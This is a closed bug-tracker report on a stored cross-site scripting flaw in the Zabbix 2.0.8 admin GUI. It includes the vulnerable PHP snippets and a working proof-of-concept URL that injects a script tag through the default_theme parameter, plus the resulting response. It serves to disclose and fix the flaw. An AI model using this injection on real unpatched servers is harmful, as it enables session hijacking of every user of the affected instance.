Details

    • Type: Incident report
    • Status: Closed
    • Priority: Critical
    • Resolution: Fixed
    • Affects Version/s: 2.0.8
    • Fix Version/s: 2.0.9rc1, 2.1.5
    • Component/s: Frontend (F)
    • Labels:
      None
    • Environment:
      Ubuntu

      Description

      The default_theme is set by an administrative user who has access to adm.gui.php

      adm.gui.php:
      $configs = array(
      'default_theme' => get_request('default_theme'),
      ...
      update_config($configs)

      default_theme is not sanitized before being stored in the database

      page_header.php:
      $css = $config['default_theme'];
      <body class="<?php echo $css; ?>">

      Example:
      http://zabbixserver/zabbix/adm.gui.php?sid=f449c57db01c1234&form_refresh=1&form_refresh=1&default_theme=originalblue">test1234<script>alert("xss")</script>&dropdown_first_entry=1&dropdown_first_remember=1&search_limit=1000&max_in_table=50&event_ack_enable=1&event_expire=7&event_show_max=100&server_check_interval=10&save=Save

      (change sid to valid admin sid)

      Response:
      <body class="originalblue">
      test1234
      <script>
      alert("xss")
      </script>
      /main.css" />

      page_header.php is called in every page

      blah@blah:/var/www/zabbix$ grep -i "page_header" ./*
      /acknow.php:require_once dirname(_FILE_).'/include/page_header.php';
      ./actionconf.php:require_once dirname(_FILE_).'/include/page_header.php';
      ./adm.gui.php:require_once dirname(_FILE_).'/include/page_header.php';
      ./adm.housekeeper.php:require_once dirname(_FILE_).'/include/page_header.php';
      ./adm.iconmapping.php:require_once dirname(_FILE_).'/include/page_header.php';
      ....truncated....

      The theme saved is displayed for every user on every page, making this critical.

      Thanks

      -Lincoln

        Attachments

          Activity

            People

            • Assignee:
              iivs Ivo Kurzemnieks
              Reporter:
              lincoln Lincoln
            • Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: